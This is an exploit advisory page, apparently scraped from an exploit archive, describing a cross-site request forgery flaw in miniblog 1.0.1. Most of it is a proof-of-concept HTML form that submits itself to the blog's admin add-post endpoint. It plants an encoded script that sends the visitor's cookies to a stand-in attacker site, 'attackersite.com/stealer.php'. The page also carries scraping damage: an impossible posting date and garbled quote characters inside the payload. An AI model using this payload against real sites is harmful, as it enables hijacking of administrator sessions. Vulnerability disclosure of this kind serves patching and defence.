Home / os / wince

Miniblog 1.0.1 Cross Site Request Forgery

Posted on 30 November -0001

<HTML><HEAD><TITLE>miniblog 1.0.1 Cross Site Request Forgery</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title : miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post) # Author : Besim # Google Dork : # Date : 09/10/2016 # Type : webapps # Platform : PHP # Vendor Homepage : http://www.spyka.net/scripts/php/miniblog # Software link : http://dl.spyka.co.uk/scripts/php/miniblog-1-0-1.zip Description (admin login required) : miniblog 1.0.1 versions is vulnerable to CSRF attack, adding, delete and edit article in the sections Vulnerable page : http://localhost:8081/miniblog/*adm/admin.php?mode=add Dangerous point : if used with XSS can be steal on the admin's cookie information. *############### CSRF PoC ###############* <html> <!-- CSRF PoC --> <body> <form action=" http://localhost:8081/miniblog/adm/admin.php?mode=add&id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20post%20in%20%3Cb%3EC:xampphtdocsminiblogadmedit.php%3C/b%3E%20on%20line%20%3Cb%3E8%3C/b%3E%3Cbr%20/%3E" method="POST"> <input type="hidden" name="data&#91;post&#95;title&#93;" value="<script>location&#46;href&#32;&#61;&#32;AC/&#128;&#152;http&#58;&#47;&#47;www&#46;attackersite&#46;com&#47;stealer&#46;php&#63;cookie&#61;AC/&#128;&#153;&#43;document&#46;cookie&#59;<&#47;script>" /> <input type="hidden" name="data&#91;post&#95;content&#93;" value="tester" /> <input type="hidden" name="data&#91;published&#93;" value="1" /> <input type="hidden" name="miniblog&#95;PostBack" value="Add" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ######################################## </BODY></HTML>

 

TOP